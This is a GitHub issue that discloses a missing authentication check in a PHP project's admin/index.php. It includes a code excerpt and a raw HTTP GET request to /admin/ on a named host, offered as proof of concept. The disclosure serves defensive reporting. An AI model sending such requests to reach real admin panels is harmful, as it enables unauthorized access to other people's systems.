We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
admin/index.php There is no authentication check on the cookie or session or header header, resulting in unauthorized access
admin/index.php
<?php session_start(); ?> .......... .......... .......... <?php //success message if(isset($_POST['success'])) { $success = $_POST["success"]; echo "<h1 style='color:#0C0'>Your Product was added successfully <span class='glyphicon glyphicon-ok'></h1></span>"; } ?></h3> </div> </div></div></div> <?php include("include/js.php"); ?> </body> </html>
GET /admin/ HTTP/1.1 Host: www.onsp.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25 Upgrade-Insecure-Requests: 1
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Vulnerability file address
admin/index.phpThere is no authentication check on the cookie or session or header header, resulting in unauthorized accessPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: